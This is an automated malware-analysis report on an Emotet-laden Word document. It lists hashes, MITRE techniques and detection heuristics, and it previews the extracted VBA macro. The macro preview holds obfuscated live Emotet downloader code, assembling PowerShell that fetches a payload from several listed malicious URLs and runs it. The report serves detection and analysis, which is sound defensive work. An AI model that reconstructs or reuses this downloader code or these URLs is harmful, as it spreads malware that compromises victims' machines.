Emotet Office (OLE) malware analysis — malicious · 15d49a5d2e14aea3

MALICIOUS

Office (OLE)

91.5 KB Created: 2017-11-09 15:26:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: c3bc4dfc3f89a6a1d429b86b8e951199 SHA-1: c343a8c42a74efcd0eb00d93e5ebc8bf2479784a SHA-256: 15d49a5d2e14aea33c42d6a90df39930f4be1d0a342803f43306f54c18ecd068

244 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen function, which is a common technique for Emotet. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, likely to download and execute a secondary payload. The ClamAV detection name 'Doc.Macro.Emotet-6374344-0' further supports the Emotet family attribution.

Heuristics 8

ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	51255 bytes
SHA-256: `5f822a27e6914aef0c49170394a112e379fede2a16b767882b3fbdecb7362d8f`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 34 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IfAEzLjvV" Function iFCNHnzZS() MqITtjM = "" + CRwUjkW + Mid("DR27KK5YrSr71nsVpMUVCHsokULcJXwKv9sQf", 11, 2) + mGcPltr + UDknDXG mnvstSMsC = "" + InddJMj + Mid("ItKF24ZmUBVQ4MimoX2SvtVKMC 343245);K7M0+7M0tqhuas = Kt7M0+7M0qenv7M0wfd+wfd+7M0:public 7M0+7M0+ fo7'+'M0+7M0wfd+wfdh7M0+7M0r'+'JAfoh7M0+7M0 7M0+7M0+ Ktqk7M0+7M0ar7M0+7K9fm", 27, 141) + KUonRSh + iubNjtR ZGCnwhSDh = "" + JZOucpi + Mid("LRfKI+'M0-JoIn7M07M0)wfd) -'+'RepLacewfd7M0wfd,'+'[ChAR]'+'39-cREPl'+'ACe([Ch'+'AR'+']72+7rVdGf5j9DzRsrQCbwq", 6, 84) + GzjXsXj + LPozNIO bdiZFbiQN = "" + zlQcWSw + Mid("RHs1),[Ch'+'AR]36))') -RepLAce'JCl',[char]36-cRePlAce'wfd',[char]39)\|&( $shelLid[1]+$ShelLID[13]+'X')vAw7B68sjC", 4, 98) + FIThPRs + kwcmich fLfhSqjOF = "" + jlmwlmV + Mid("hta6nQtGfKILlbwTlj8k09sjSVztRM0+7M0u/Uamu'+'Kwfd+wfd7M0+7M0Mpu/,httpJYFG7VfMl", 30, 39) + fuwZoiU + zzzITPq MsjHILdHwA = "" + AlqvPOG + Mid("0oCCQAYKibcGEa7Ktq'+'bcd){try{7M0+7M0Ktqf7M0+7M0ranc7M0+7M0.Down'+'wfd+wfd7M0+7M0loadFile(Ktqabcwfd+wfd.T7M0+7M0oS7M0+7M0t7M0+7M0r7M0+'+'7M0ingwfd+wfd(7M0+7M0)wi0zsCmLfjdzj", 16, 144) + jMlGtvG + rppALTm GVRDFcENW = "" + SYAbISW + Mid("QEdIWV6BHN05EcnEquivqPjuMXhaR]39).RePLAce(7M0rJA7M0,7M047t'+'7M0).RePLAc'+'e(7M0Ktq7M0,[stRIngwfd+wfd][ChaR]36) H1Y& ( Vo3VerboSepReFErEnCE.toStwfd+wfdR'+'i'+'nG()[1,3]+'+'7M0X7'REUKN", 27, 152) + GEwRGzb + SbWvFwh jBLNYC = "" + AkLUjzV + Mid("kGd+wfd7M0+7M0t K7M0+7M0tq_7M0+7M0.Ex7M0+7M0cept7M0+7M0i7M0+7M0o7M0+7M0n7M0+7M'+'0.wfd+3ENwKhCLuaMqSqfBhjc6d16nairo8", 3, 85) + vrLDDzk + ZJDCfBW urtJHAtDi = "" + kkPkvFP + Mid("Yr2asQ1T[ChAR]49+[ChAR]89),[ChAR]124 -RepLa'+'ce([jUqiwWYmX5X5VDBHFGKrq2IYtiHL", 9, 43) + kAzwpli + jEwVuGE dFnNA = "" + muGRiuE + Mid("At71iYMBLqnsadawfd+wfdsd 7M0+7M0= 7M0+7M0n'+'ew-ob7M0+7M0ject r7M0+7M0andom7M0+7MHZ", 10, 72) + TfsIjvv + XiGUhih amiINnv = "" + PdcKCka + Mid("zkQafWi95kB4YEjaKcmmU99r1wfdMess7M0+7M0wfd+w'+'fda7M0+7M0ge;'+'}7M0+7M0}7M0).RePLAce(7M0foh7M0,[wfd+wfdstRIng][CaCdEj7UlQUL1b", 26, 87) + XTFRQJR + roFulcZ aZZUwVtPj = "" + sWczjzz + Mid("bmXrYPA, Ktqh7M'+'0+7M0uas7M0+7M0);Iwfd+wf'+'dnvoke-I7M'+'0+7M0te7M'+'0+7M0m(Kt7M0+7M0qhu7M0+'+'7M0as);break;}c7M0+7M0atch{wr7M0'+'+'+'7M0ite-hoswfVzL", 8, 140) + OkHKjGs + tLfodcf hwduwfEF = "" + Rotcnjs + Mid("5mhrT+7wfd+wfdM0i7M0+7M0e7M0+7M0n7'+'M0+7M0t;Ktwfd+wfd7M0+7M0YBpjl", 6, 56) + NaoaTQO + zorrzsh ZohkRVsnvfh = "" + vAovHaq + Mid("dY2O0RGre/Tx7M0+7M0Kvj/'+'foh.7M0+7M0Split(f7M0+7M0oh,f7M0+7M0oh);K7'+'M0+wfd+wf'+'d7M0t7wfd+wfdM0+7M0q7M0+7M0k7M0+7M0a7M0+7M0rapas = K7M0+7M0tq'+'7M0+7M0nsawfd+wfdda7M0+7M0sd'+'.ne'+'7M0+7M0xt(17M0+7M0,PPK9uwk5GvVH", 8, 196) + aSstQnw + zGQDAGF SiaFE = "" + CClHUIX + Mid("5q48NbDjQwfd+w'+'fd0wfd+wfd+7M0O/7M0+7M0,h7M0+7M0ttp://mo7M0+7M0nit'+'o7M0+7M0reointelig'+'ente.c7M0+7M0om.ar/7M0+7M0gkN7M0+7M0uNKlYK/,7'+'M0+7M'+'0htt7M0+7M0pwfd+wfd://eda7M0+7M0vspb.vWpNiUzs", 10, 175) + tzTJWYc + asJmlsJ XmuLZ = "" + Stmzfzz + Mid("QuBdXiZZr522AXJwBWtI (('. ( JClenv:PUbLIC[13]+JCleNV:'+'PublIC[5]+'+'wfdxwfd)(((wfd (7M0K'+'7M0+7M0tq7M0+7M0fr7M0+7M0anc = new7M0+7M0-ob7M0+7M0ject Syste7M0+7M0m.Net.Web7M0wfd+wfd+7M0Cl7M097Yo", 21, 168) + jlXhdJf + ziWzjKG HWzUqSOjD = "" + AoMMsPc + Mid("IbZQXCb0quTj10Q4WFAfiOjZ7M0+7M0:7M0+7M0//re7M0+7M0mon7M0+7M0t-sh7M0+7M0la7M0+7M0n'+'go7M0+wfd+wfd7M0v.7M0+7M0ru/Q/,7M0+7M0http:7M0+7M0//7'+'M0+7M0www.l7M0+7M0edpu7jijJRfwbr", 25, 139) + KEqZppL + KFatIuU XALmv = "" + nUSqvOf + Mid("LWYFjw4nE0;K7M0+wfd+wfd7M0t7M0+7wfd+wfdM0qb7M'+'0+7M0c7M0+7M0d7wfd+wfdM0+7M0 7Mwfd+wfd0+7M0= fo7M0+7M0hhttp7M0+7M0://wfd+wfdremont-br7M0wfd+wfd+7M0i'+'7M0+7M0tv.'+'r7bIN6hRQqu", 10, 157) + zPiUMTK + qdCfvzf zriUmw = "" + bRwFYKb + Mid("vfpt9EwcdN8O7pM0+7M0blicid'+'ad'+'7M0+7M0.'+'com/7M0+7M0j7M0+7M0t7M0+7M0vsZ7Mnn5T2hHZG", 15, 63) + rUvowZc + vZmlBRh HJhtbaUCC = "" + jpZUtvi + Mid("pF74M0+7M0u/7M0+7'+' ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.